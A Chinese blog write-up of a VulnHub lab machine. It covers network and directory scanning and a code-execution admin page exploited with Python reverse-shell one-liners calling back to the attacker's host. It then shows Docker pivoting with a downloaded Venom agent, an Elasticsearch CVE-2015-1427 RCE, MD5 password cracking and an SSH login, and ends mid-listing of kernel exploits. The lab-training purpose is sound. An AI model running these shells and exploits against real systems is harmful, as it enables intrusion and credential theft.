title: vulhub打靶第一周
description: vulhub打靶第一周 难度:middle
date: 2023-06-01
categories:
刷完HTB所有简单靶机后,来看看vulhub的靶机提升一下自我,感谢@xiaoqiu
的鼎力相助
下载地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ ./fscan -h 192.168.64.1/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.64.2 is alive
(icmp) Target 192.168.64.1 is alive
(icmp) Target 192.168.64.128 is alive
(icmp) Target 192.168.64.132 is alive
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo arp-scan -l -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:17:07, IPv4: 192.168.64.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.64.1 00:50:56:c0:00:08 VMware, Inc.
192.168.64.2 00:50:56:e3:65:6e VMware, Inc.
192.168.64.132 00:0c:29:3f:6b:8f VMware, Inc.
192.168.64.254 00:50:56:ed:bf:51 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 4 responded
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap 192.168.64.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:31 CST
Nmap scan report for 192.168.64.1
Host is up (0.00057s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
903/tcp open iss-console-mgr
1086/tcp open cplscrambler-lg
1234/tcp open hotline
3306/tcp open mysql
5357/tcp open wsdapi
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
9200/tcp open wap-wsp
10002/tcp open documentum
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.64.2
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:E3:65:6E (VMware)
Nmap scan report for 192.168.64.132
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)
Nmap scan report for 192.168.64.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.64.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:ED:BF:51 (VMware)
Nmap scan report for 192.168.64.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.79 seconds
可以看到三种结果不尽相同,但是都有一个目标靶机192.168.64.132
我们可以使用nmap
进行更进一步的信息收集:
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap --min-rate 10000 192.168.64.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:36 CST
Nmap scan report for 192.168.64.132
Host is up (0.00071s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
只有5000端口能利用,我们访问看看:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lUbuEVd0-1685660171846)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601133912-1yivvba.png)]
简单测试后好像并没有发现常规漏洞,对这个网站进行下一步的信息收集
因为这里是ip地址,就不进行子域名收集了
对他的目录进行爆破看看:
目录扫描有三个工具都可以试试:
python dirsearch.py -u http://192.168.64.132:5000/
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# 需要提前安装的
# 1.seclists字典 --> 安装方法:sudo apt install seclists
#
# 2.dirseach --> 安装方法:法1.直接输入dirseach默认安装,以后直接当命令用
# 法2.git clone https://github.com/maurosoria/dirsearch
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.64.132:5000/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,301
________________________________________________
:: Progress: [100/26584] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: [Status: 200, Size: 401, Words: 28, Lines: 20, Duration: 94ms]
* FUZZ: admin
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.64.132:5000/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/01 13:43:27 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 401]
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ sudo python dirsearch.py -u http://192.168.64.132:5000/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11710
Output: /home/kali/Tools/dirsearch/reports/http_192.168.64.132_5000/__23-06-01_13-44-06.txt
Target: http://192.168.64.132:5000/
[13:44:06] Starting:
[13:44:40] 200 - 401B - /admin
gobuster
和dirseach
比较友好推荐这两个。另外gobuster
还支持子域名探测,可以参考qing3feng.github.io/2023…中的命令
我们搜集到/admin
可利用,访问看看
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9X67Wtuf-1685660171846)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601135120-nbic7kf.png)]
发现是一个代码执行,我们输入的都会被传入exec执行
写一个反弹shell:
下面这两种都可以:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.64.128] from (UNKNOWN) [192.168.64.132] 43205
/app # ls /
ls /
app dev home media proc run srv tmp var
bin etc lib mnt root sbin sys usr
/app # whoami
whoami
root
发现直接是一个root
权限,甚至不需要提权
看一下网卡信息:
/app # ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:217054 errors:0 dropped:0 overruns:0 frame:0
TX packets:215883 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:21519988 (20.5 MiB) TX bytes:30322971 (28.9 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
居然是只有一个172.17
的网段,我们明明是靠着192.168
的网段进来的,却拿到了172.17
的机子,说明这个很有可能是192.168.64.132
的docker
容器,可以使用命令 cat /proc/1/cgroup
来看看我们猜测是否正确:
/app # cat /proc/1/cgroup
11:hugetlb:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
10:perf_event:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
9:blkio:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
8:freezer:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
7:devices:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
6:memory:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
5:cpuacct:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
4:cpu:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
3:cpuset:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
2:name=systemd:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
可以看到这种后面全是一串字符的就可以确定是docker了
我们可以对比一下本机kali的:
┌──(kali㉿kali)-[/var/www/html]
└─$ cat /proc/1/cgroup
0::/init.scope
接下来就是如何从docker中逃逸出来了
所以我们要扫网段,但是这个docker
容器没有可利用的扫描工具,最简单的就是利用shell写个脚本了:
/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms
收到三个请求包
但是我们想进一步探测肯定想利用集成的工具,所以我们要搭建隧道利用本机kali
的工具进行扫描
那么如何搭建隧道呢?这里利用Venom
┌──(kali㉿kali)-[~/Tools]
└─$git clone https://github.com/Dliv3/Venom
安装好后进入目录编译一下:
┌──(kali㉿kali)-[~/Tools/Venom]
└─$ ./build.sh
build macos x64 admin & agent...
go: downloading github.com/cheggaaa/pb/v3 v3.0.1
go: downloading golang.org/x/crypto v0.0.0-20190911031432-227b76d455e7
go: downloading github.com/libp2p/go-reuseport v0.0.1
go: downloading github.com/fatih/color v1.7.0
go: downloading github.com/VividCortex/ewma v1.1.1
go: downloading github.com/mattn/go-colorable v0.1.2
go: downloading github.com/mattn/go-isatty v0.0.8
go: downloading github.com/mattn/go-runewidth v0.0.4
go: downloading golang.org/x/sys v0.0.0-20190412213103-97732733099d
build linux x64 admin & agent...
build linux x86 admin & agent...
build windows x86 admin & agent...
build arm eabi5 agent...
build mipsel agent..
进入release
目录,本地开启一个http
服务供docker
下载客户端用于连接我们:
我们先看一下docker的环境是多少位的内核版本多少:
/app # cat /proc/version
Linux version 3.13.0-24-generic (buildd@panlong) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
/app # uname -a
Linux 755411217bdd 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 Linux
可以看到是64位的
我们在/Venom/release
目录下面用python
开一个web
服务:
┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
如何在目标靶机上下载客户端:
/app # wget 192.168.64.128:8888/agent_linux_x64
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
agent_linux_x64 100% |*******************************| 3564k 0:00:00 ETA
kali开启监听端口:
┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ ./admin_linux_x64 -lport 2333
Venom Admin Node Start...
██▒ █▓█████ ███▄ █ ▒█████ ███▄ ▄███▓
▓██░ █▓█ ▀ ██ ▀█ █▒██▒ ██▓██▒▀█▀ ██▒
▓██ █▒▒███ ▓██ ▀█ ██▒██░ ██▓██ ▓██░
▒██ █░▒▓█ ▄▓██▒ ▐▌██▒██ ██▒██ ▒██
▒▀█░ ░▒████▒██░ ▓██░ ████▓▒▒██▒ ░██▒
░ ▐░ ░░ ▒░ ░ ▒░ ▒ ▒░ ▒░▒░▒░░ ▒░ ░ ░
░ ░░ ░ ░ ░ ░░ ░ ▒░ ░ ▒ ▒░░ ░ ░
░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░
░
{ v1.1 author: Dlive }
目标机连接kali:
/app # ./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
2023/06/01 06:45:18 [+]Successfully connects to a new node
连接成功后可以用show查看连接的情况:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l4ckzks9-1685660171847)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601192857-7d55eso.png)]
我们可以利用goto 1
进入该节点
可以利用该节点搭建socket5
代理
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3Ulflesu-1685660171847)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193058-hd3jrd8.png)]
接着利用本机的kali
的proxychains
来连接这个socket
代理
┌──(kali㉿kali)-[~/桌面]
└─$ sudo gedit /etc/proxychains4.conf
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QqAYFo5k-1685660171847)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193233-jy5kae1.png)]
配置好代理就可以开始信息收集了
结合上面的信息收集我们知道目前已经拿下的docker容器是172.17.0.2
/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms
还剩172.17.0.3
和172.17.0.1
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.1
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.3
Nmap scan report for 172.17.0.3
Host is up (0.025s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
9200/tcp open wap-wsp
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
我们访问了172.17.0.1
其实可以看出来就是刚才的172.17.0.1
,可能他就是网关
探测一下172.17.0.3
的详细信息:
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -sV -p 9200 172.17.0.3
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Brain Cell; cluster: elasticsearch; Lucene 4.10.2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
发现是一个Elasticsearch
,可以看一下有没有nday
可以利用:
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Elasticsearch
------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Byp | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Down | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directo | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Data | multiple/webapps/50152.py
------------------------------------------ ---------------------------------
Shellcodes: No Results
发现有一些是可以利用的,我们首先尝试rce的:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EdYKXAwU-1685660171848)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195524-zfpsxwd.png)]
可以看到它的帮助文档,我们输入命令:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ proxychains python2 36337.py 172.17.0.3
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain ... 192.168.64.128:10001 ... 172.17.0.3:9200 ... OK
bin
boot
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
passwords
proc
root
run
发现可以成功执行,这里要记得带proxychains
发现有一个passwords
,我们看看:
~$ cat passwords
[proxychains] Strict chain ... 192.168.64.128:10001 ... 172.17.0.3:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
看着像md5,我们用在线工具查一下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QDWEApfX-1685660171848)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195857-8rzdc79.png)]
解出1337hack
john:1337hack
test:1234test
admin:1111pass
root:1234pass
jane:1234jane
解出来就是这些账号密码,结果只有一个john可以登陆:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ssh [email protected]
The authenticity of host '192.168.64.132 (192.168.64.132)' can't be established.
ED25519 key fingerprint is SHA256:JZd5+gaOpg7shDrwi9MncScWvVqsSRB4+LpUUrRP3yo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.64.132' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information disabled due to load higher than 1.0
Last login: Thu Jun 1 01:27:18 2023
john@socnet:~$
发现常用的两种手段都无法提权:
john@socnet:~$ find / -perm -type f 2 > /dev/null
find: invalid mode `-type'
john@socnet:~$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on socnet.
那只能利用系统内核漏洞提权了
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
发现它的系统的内核版本低的可怜啊,想在最新的内核版本都达到5.17了,差了两个大版本实际上是差别非常大的
查找linux3.13的内核提权漏洞:
┌──(kali㉿kali)-[~]
└─$ searchsploit linux 3.13
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit) | linux/remote/42697.rb
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution | linux/remote/33805.pl
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) | linux/remote/42695.rb
AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak | linux/dos/40181.c
CyberArk < 10 - Memory Disclosure | linux/remote/44829.py
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure | linux/dos/44428.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read | linux/local/44688.txt
DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) | linux/webapps/42769.rb
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py
Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service | linux/dos/44857.html
id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution | linux/remote/19079.c
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution | linux/webapps/44543.txt
KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception | linux/dos/2954.html
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure | linux/remote/44022.md
Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module | linux/dos/46477.txt
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall | linux/dos/44641.c
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escalation | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | linux/dos/36743.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3) | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2) | linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | linux/dos/31305.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
Logpoint < 5.6.4 - Root Remote Code Execution | linux/remote/42158.py
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates | linux/dos/46435.txt
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates | linux/dos/46435.txt
Nagios < 4.2.2 - Arbitrary Code Execution | linux/remote/40920.py
Nagios < 4.2.4 - Local Privilege Escalation | linux/local/40921.sh
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation | linux/local/42305.txt
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service | linux/dos/34522.txt
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service | linux/dos/34521.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation | linux/local/41196.txt
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control | linux/webapps/44757.txt
pam-krb5 < 3.13 - Local Privilege Escalation | linux/local/8303.c
PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution | linux/local/3426.php
PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure | linux/local/3427.php
PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow | linux/local/3571.php
